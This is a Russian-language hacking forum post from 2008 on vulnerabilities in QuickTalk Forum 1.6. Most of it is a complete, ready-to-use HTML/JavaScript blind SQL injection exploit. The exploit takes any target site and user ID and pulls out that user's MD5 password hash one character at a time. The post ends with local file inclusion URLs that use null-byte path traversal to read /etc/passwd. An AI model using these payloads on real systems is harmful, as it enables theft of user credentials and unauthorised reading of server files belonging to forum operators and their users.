13.03.2008, 12:09
|
|
Постоянный
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
Уязвимости QuickTalk Forum
Уязвимости QuickTalk Forum
URL производителя: http://www.qt-cute.org/
QuickTalk Forum <= 1.6 Blind SQL Injection Exploit
Код:
<html>
<head>
<title>QuickTalk Forum <= 1.6 Blind SQL Injection Exploit</title>
<script language="Javascript" type="text/javascript">
/*
-----------------------------------------------------------------------------------------------
- QuickTalk Forum Blind SQL Injection Exploit (qtf_ind_search_ov.php) -
- Info ---------------------------------------------------------------------------------------
- Author: t0pP8uZz & xprog -----------------------------------------------------------
- Exploit Coded By t0pP8uZz ---------------------------------------------------------
- Site: h4ck-y0u.org / milw0rm.com ------------------------------------------------
----------------------------------------------------------------------------------------------
- Passwords ARE IN MD5 ----------------------------------------------------
- Peace -----------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
*/
var site, uid, res = "";
function Start() {
site = document.getElementById("site").value;
uid = document.getElementById("pid").value;
document.getElementById("output").value = "Exploiting, Please Wait..";
Main(1, 48);
}
function Main(substr, num) {
var xmlhttp = false;
var url = site+"/qtf_ind_search_ov.php?a=user&id=1 and ASCII(SUBSTRING((SELECT pwd FROM qtiuser WHERE id="+uid+" LIMIT 0,1),"+substr+",1))="+num+"/*";
try {
xmlhttp = new XMLHttpRequest();
} catch(e) { alert("Unsupported Browser! Run Exploit In Mozilla Firefox!"); }
if(xmlhttp) {
netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
xmlhttp.onreadystatechange = function() {
if(xmlhttp.readyState == 4) {
var content = xmlhttp.responseText;
var ele = document.getElementById("output");
if(!content.match(/0 Found/i)) {
res += String.fromCharCode(num);
ele.value = res;
num = 48;
substr++;
}
else {
if(num == 59) { num = 96; }
else { num++; }
}
if(res.length >= 32) { alert("Exploitation Successfull!. Admin MD5 Hash: "+res); return true; }
Main(substr, num)
}
};
xmlhttp.open("GET", url, true);
xmlhttp.send(null);
}
}
</script>
<style type="text/css">
<!--
.style1{color: #CC0000}
.style2 { color: #000000; font-size: 12px;}
.style3 {color: #FF0000; font-weight: bold; font-size: 12px; }
.style4 {color: #FF0000; font-size: 10px;}
-->
</style>
</head>
<body>
<p class="style1">- QuickTalk Forum <= 1.6 Blind SQL Injection Exploit -</p>
<p class="style2">Site: <input type="text" id="site" /> (URL to QuickTalk Forum site ie: http://www.site.com/quicktalkforum)</p>
<p class="style2">User: <input type="text" id="pid" /> (UserID of the user you want the MD5 hash too.)</p>
<p class="style2"><input type="button" onclick="Start();" id="button" value="Exploit" /></p>
<p class="style3">Output (MD5 Hash): <input type="text" id="output" size="100" /></p> (Do not touch untill exploit says its done)
<p class="style2">Notes: QuickTalk Forum uses the MD5 algorithms to encrypt passwords</p>
<p class="style4">Coded By t0pP8uZz - h4ck-y0u.org</p>
</body>
</html>
Инклюдинг локальных файлов в QuickTalk forum
Уязвимость позволяет удаленному пользователю получить доступ к важным данным на системе.
Код:
http://[host]/qtf_checkname.php?lang=./../../../../../../../../../../etc/passwd%00
http://[host]/qtf_j_birth.php?lang=./../../../../../../../../../../etc/passwd%00
http://[host]/qtf_j_exists.php?lang=./../../../../../../../../../../etc/passwd%00
|
|
|